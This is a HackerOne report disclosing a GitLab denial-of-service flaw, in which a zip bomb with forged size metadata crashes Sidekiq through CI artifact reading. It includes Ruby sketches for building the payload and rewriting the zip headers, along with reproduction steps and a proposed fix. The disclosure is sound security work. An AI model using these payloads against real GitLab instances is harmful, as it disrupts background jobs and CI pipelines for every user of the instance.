Sidekiq background job DoS by uploading malicious CI job artifact zips
HackerOne report #1736230 by luryus
on 2022-10-15, assigned to @nmalcolm:
Report
Summary
Very similar issue to report #1716296.
An attacker can upload a crafted CI job artifact zip file in a project that uses dynamic child pipelines and make a Sidekiq job try to allocate up to 5 gigabytes of memory. When Sidekiq is memory-limited, as it usually is because it runs in a memory-limited container or on a host that simply does not have that much memory, this will likely cause the Linux kernel to OOMKill Sidekiq. In small (self-hosted) Gitlab environments with only a single Sidekiq node, this will cause some background jobs to fail and delay the execution of others. For instance, the CI pipelines of other users may get interrupted. In other words, this can cause a minor denial of service.
By altering the "uncompressed size" metadata entries in the artifact zip file, the attacker can bypass size limitations that are supposed to prevent this kind of excessive memory use. When reading the artifact file for the dynamic child pipeline feature, a background job checks that both the archive zip file itself and the reported uncompressed size of the pipeline yaml file inside it are under 5 megabytes. A 5 gigabyte empty file compresses into a 5 megabyte zip file, and by altering the metadata this kind of a file can be made to pass the size checks.
Because the attacker only needs to upload a single small file (a few megabytes) to achieve this, it is difficult or impossible to mitigate this with rate limits. The attack can be repeated as frequently as the attacker can create pipelines, and therefore the attacker can continuously cause crashes.
Compared to my previous report (#1716296), where a very similar issue exists in Nuget package uploads, this one is a tiny bit more limited because the zip file size limit is smaller (5 megabytes), which caps the actual uncompressed size the attacker can use at about 5 gigabytes. However, that is enough to crash a typical Sidekiq instance; for example, gitlab.com seems to have its Sidekiq node memory limits set to 3-6 gigabytes (https://gitlab.com/gitlab-com/gl-infra/k8s-workloads/gitlab-com/-/blob/master/releases/gitlab/values/gprd.yaml.gotmpl#L772)
Steps to reproduce
- In your own Gitlab instance, import the attached project.
- Go to the project CI settings and configure a Docker-based Gitlab runner for it.
- Monitor the sidekiq processes in the Gitlab instance with, for example, these tools:
  - `htop` for general system memory usage and processes
  - `tail -f path/to/sidekiq/logs` for monitoring sidekiq activity (the exact log file path depends on the installation)
  - `dmesg -T -w` for kernel logs (OOMKill logs end up here)
- In the imported Gitlab project, go to CI/CD -> Pipelines, click "Run pipeline", and create a new pipeline for the main branch.
- The gen-config CI job will create the payload zip file and upload it. Sidekiq will crash soon after, when it tries to read the large 5 gigabyte file from the zip.
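For reference, the payload can be produced with a short script along these lines. This is only a sketch of what the attached project's gen-config job presumably does, with hypothetical filenames; note that uncompressed sizes over 4 GiB need ZIP64 support to be recorded at all:

```ruby
# Sketch of payload creation (filenames are hypothetical; the attached
# project's gen-config job does the equivalent).
require 'zip'

# Uncompressed entry sizes over 4 GiB need ZIP64 extensions.
Zip.write_zip64_support = true

# A sparse 5 GB file of zero bytes; deflate shrinks this to roughly 5 MB.
File.open('payload.yml', 'wb') { |f| f.truncate(5 * 1024**3) }

Zip::File.open('artifacts.zip', Zip::File::CREATE) do |zip|
  zip.add('payload.yml', 'payload.yml')
end
```

The resulting zip itself stays under the 5 megabyte archive limit, which is what makes the attack cheap to repeat.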
Impact
An attacker can get a sidekiq worker OOMKilled by a simple CI job file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.
This can affect any user in the Gitlab instance because much of Gitlab's functionality relies on sidekiq jobs. For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when sidekiq crashed.
Examples
Example project attached. The project includes these files:
- `artifacts.zip`: a normal zip file where an empty 5 gigabyte file has been zipped. This is a completely normal file; no metadata changes have been made to it.
- `alter.py`: a Python script that rewrites the "uncompressed size" metadata entries in the zip file (a sketch of the rewrite appears below)
- `.gitlab-ci.yml`: pipeline configuration that will reproduce the issue
A demo video where I reproduce this in my own Gitlab instance is also attached.
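The metadata rewrite that alter.py performs is conceptually simple. Below is a hedged Ruby sketch of the same idea, assuming plain 32-bit size fields; entries over 4 GiB actually store their sizes in ZIP64 extra fields, which a complete script has to patch in the same way:

```ruby
# Sketch: overwrite every "uncompressed size" field so the archive claims
# its entries are tiny. Offsets are from the ZIP specification (APPNOTE.TXT).
# Naive scan: the signatures could in principle also occur inside compressed
# data, so a robust tool should walk the records properly.
data = File.binread('artifacts.zip')
fake_size = [1024].pack('V') # claim 1 KiB, as a little-endian uint32

pos = 0
while (pos = data.index("PK\x03\x04", pos)) # local file header
  data[pos + 22, 4] = fake_size             # uncompressed size at offset 22
  pos += 4
end

pos = 0
while (pos = data.index("PK\x01\x02", pos)) # central directory entry
  data[pos + 24, 4] = fake_size             # uncompressed size at offset 24
  pos += 4
end

File.binwrite('artifacts-altered.zip', data)
```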
What is the current bug behavior?
In `Gitlab::Ci::ArtifactFileReader` the yaml file size is validated by checking the `total_size` property of the artifact metadata entry:

```ruby
metadata_entry = job.artifacts_metadata_entry(path)

if metadata_entry.total_size > MAX_ARCHIVE_SIZE
  raise Error, "Artifacts archive for job `#{job.name}` is too large: max #{max_archive_size_in_mb}"
end
```
That metadata entry seems to be created by Gitlab Workhorse when uploading the artifact, and it uses the uncompressed size field from the zip file metadata. The attacker can freely set the value of this field, and therefore the size check can be effectively bypassed.
`ArtifactFileReader` then proceeds to extract the file from the zip archive, without any additional size check. `zip_file.read` will try to buffer the 5 gigabyte file into memory, which it cannot do before Linux's OOMKiller kills the sidekiq process.
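The failure mode can be reproduced in isolation with plain rubyzip. This is a simplified stand-in for the vulnerable read path, not the actual GitLab code:

```ruby
# Simplified stand-in for the vulnerable pattern: Zip::File#read buffers the
# whole uncompressed entry into a single string, regardless of its real size.
require 'zip'

Zip::File.open('artifacts.zip') do |zip|
  entry = zip.entries.first
  content = zip.read(entry) # allocates the full 5 GB; OOMKilled in a limited container
  puts content.bytesize
end
```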
What is the expected correct behavior?
`ArtifactFileReader` should limit the amount of data read from the zip file to avoid excessive memory use.
Note that rubyzip explicitly states that when using `read`, the caller has to do the size checks itself (https://github.com/rubyzip/rubyzip#size-validation):

> Note that if you use the lower level Zip::InputStream interface, rubyzip does not check the entry sizes. In this case, the caller is responsible for making sure it does not read more data than expected from the input stream.
Relevant logs and/or screenshots
See the attached video file, it includes logs.
Output of checks
Not tested on Gitlab.com, but this can have at least some effect there.
Results of GitLab environment info
Docker installation:
```
### gitlab-rake gitlab:env:info

System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version:6.4.2
Go Version: unknown

GitLab information
Version: 15.4.2-ee
Revision: 4eacd5378ab
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: http://gl.lkoskela.com:8929
HTTP Clone URL: http://gl.lkoskela.com:8929/some-group/some-project.git
SSH Clone URL: ssh://git@gl.lkoskela.com:2224/some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:

GitLab Shell
Version: 14.10.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
```
Impact
An attacker can get a sidekiq worker OOMKilled by a simple file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.
The severity of this depends on the Sidekiq setup: in larger and more distributed installations the impact is smaller, since crashes are limited to a subset of Sidekiq instances. In small self-hosted environments, though, this can have a large impact on the functionality of Gitlab.
This can affect any user in the Gitlab instance because much of Gitlab's functionality relies on Sidekiq jobs. Background job execution may get delayed, or in some cases jobs may not get executed at all (if the attacker can keep Sidekiq crashing continuously). For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when Sidekiq crashed.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section:
Proposal
Since `ArtifactFileReader` uses the `Zip::File#read` interface, which uses `Zip::InputStream` internally, it does not validate the actual uncompressed size against the reported uncompressed size in the header.
In comparison, the `Zip::Entry#extract` method validates the actual size that has been extracted and written, and raises an error if it exceeds the size stated in the header.
As suggested in https://github.com/rubyzip/rubyzip#size-validation, the caller `ArtifactFileReader` needs to ensure that it does not read more than the size stated in the header:

> Note that if you use the lower level Zip::InputStream interface, rubyzip does not check the entry sizes. In this case, the caller is responsible for making sure it does not read more data than expected from the input stream.

An alternative is to use `Zip::File#get_input_stream`.
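A minimal sketch of that alternative, enforcing the existing 5 megabyte limit during the read. This illustrates the suggestion and is not GitLab's actual patch; names such as `read_entry_bounded` and the error messages are made up here:

```ruby
require 'zip'

MAX_ARCHIVE_SIZE = 5 * 1024 * 1024 # 5 MB, matching the existing limit
Error = Class.new(StandardError)   # stand-in for ArtifactFileReader::Error

# Read an entry in chunks and abort as soon as the stream yields more data
# than the size check allowed, so a forged header size cannot cause a huge
# allocation.
def read_entry_bounded(zip_file, path, limit: MAX_ARCHIVE_SIZE)
  entry = zip_file.find_entry(path)
  raise Error, "path `#{path}` does not exist inside the artifact" unless entry

  buf = ''.b
  zip_file.get_input_stream(entry) do |io|
    while (chunk = io.read(64 * 1024))
      buf << chunk
      raise Error, 'artifact entry is larger than its reported size' if buf.bytesize > limit
    end
  end
  buf
end
```

With a forged header like the one in this report, the loop aborts after reading just over 5 megabytes instead of buffering 5 gigabytes.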